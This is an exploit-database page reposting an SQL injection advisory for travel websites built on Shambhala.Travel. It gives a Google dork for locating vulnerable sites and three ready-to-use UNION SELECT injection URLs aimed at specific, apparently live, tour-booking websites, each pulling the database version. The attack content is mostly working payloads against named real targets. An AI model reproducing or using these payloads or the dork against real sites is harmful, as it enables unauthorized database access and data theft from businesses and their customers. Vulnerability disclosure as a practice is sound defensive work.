Advertisement






Powered by Shambhala.Travel - SQL Injection vulnerability

CVE Category Price Severity
CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-10-22
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100141

Below is a copy:

Powered by Shambhala.Travel - SQL Injection vulnerability
*********************************************************
#Exploit Title: Powered by Shambhala.Travel - SQL Injection vulnerability
#Date: 2020-10-21
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Shambhala.Travel"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Powered by Shambhala.Travel"

Demo :
https://www.longtailboatphiphi.com/tours-detail.php?id=-70%27%20UNION%20SELECT%201,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

https://www.triptophuket.com/tour_detail.php?id=-57%20UNION%20SELECT%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56--

https://www.tmttravelphuket.com/tour.php?id=-4%27%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.